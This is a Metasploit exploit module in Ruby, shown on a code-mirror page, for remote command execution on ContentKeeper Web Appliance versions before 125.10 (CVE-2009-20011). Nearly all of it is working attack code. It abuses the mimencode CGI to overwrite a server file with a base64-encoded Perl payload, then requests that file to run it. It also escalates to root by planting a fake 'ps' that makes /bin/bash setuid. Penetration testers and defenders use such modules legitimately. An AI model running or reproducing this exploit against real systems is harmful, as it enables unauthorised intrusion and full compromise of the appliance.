Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
23899 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'ContentKeeper Web Remote Command Execution',

16
        'Description' => %q{

17
          This module exploits the ContentKeeper Web Appliance. Versions prior

18
          to 125.10 are affected. This module exploits a combination of weaknesses

19
          to enable remote command execution as the Apache user. By setting

20
          SkipEscalation to false, this module will attempt to setuid the bash shell.

21
        },

22
        'Author' => [ 'aushack' ],

23
        'Arch'	=> [ ARCH_CMD ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2009-20011' ],

27
          [ 'OSVDB', '54551' ],

28
          [ 'OSVDB', '54552' ],

29
          [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],

30
        ],

31
        'Privileged'	=> false,

32
        'Payload' => {

33
          'DisableNops' => true,

34
          'Space' => 1024,

35
          'Compat' =>

36
                        {

37
                          'PayloadType' => 'cmd',

38
                          'RequiredCmd' => 'generic perl telnet',

39
                        }

40
        },

41
        'Platform' => ['unix'],

42
        'Targets' => [

43
          [ 'Automatic', {} ]

44
        ],

45
        'DisclosureDate' => '2009-02-25',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        Opt::RPORT(80),

58
        OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),

59
        OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),

60
      ]

61
    )

62
  end

63


64
  def check

65
    connect

66
    sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")

67
    banner = sock.get_once(-1, 3)

68
    disconnect

69


70
    if (banner =~ /500 Internal/)

71
      return Exploit::CheckCode::Vulnerable

72
    end

73


74
    return Exploit::CheckCode::Safe

75
  end

76


77
  def exploit

78
    exp = "#!/usr/bin/perl\n"

79
    exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"

80
    exp << "use IO::Socket::INET;\n"

81


82
    if (datastore['PAYLOAD'] =~ /perl/)

83
      if not datastore['SkipEscalation']

84
        print_status("Attempting to facilitate root escalation...")

85
        exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.

86
      end

87
      exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!

88
    else

89
      exp << "system(\""

90
      exp << payload.encoded.gsub('"', '\"')

91
      exp << "\");\n"

92
    end

93


94
    body = Rex::Text.encode_base64(exp)

95


96
    connect

97


98
    sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"

99
    sploit << "Host: #{datastore['RHOST']}\r\n"

100
    sploit << "Content-Length: #{body.length}\r\n\r\n"

101


102
    print_status("Uploading payload to target...")

103
    sock.put(sploit + body + "\r\n\r\n")

104
    disconnect

105


106
    select(nil, nil, nil, 3) # Wait a few seconds..

107
    print_status("Calling payload...")

108
    connect

109
    req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx

110
    req << "Host: #{datastore['RHOST']}\r\n"

111
    sock.put(req + "\r\n\r\n")

112


113
    handler

114
    disconnect

115
    select(nil, nil, nil, 3) # Wait for session creation.

116
    if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/

117
      print_status("Privilege escalation appears to have worked!")

118
      print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")

119
      print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")

120
    end

121
  end

122
end

123


124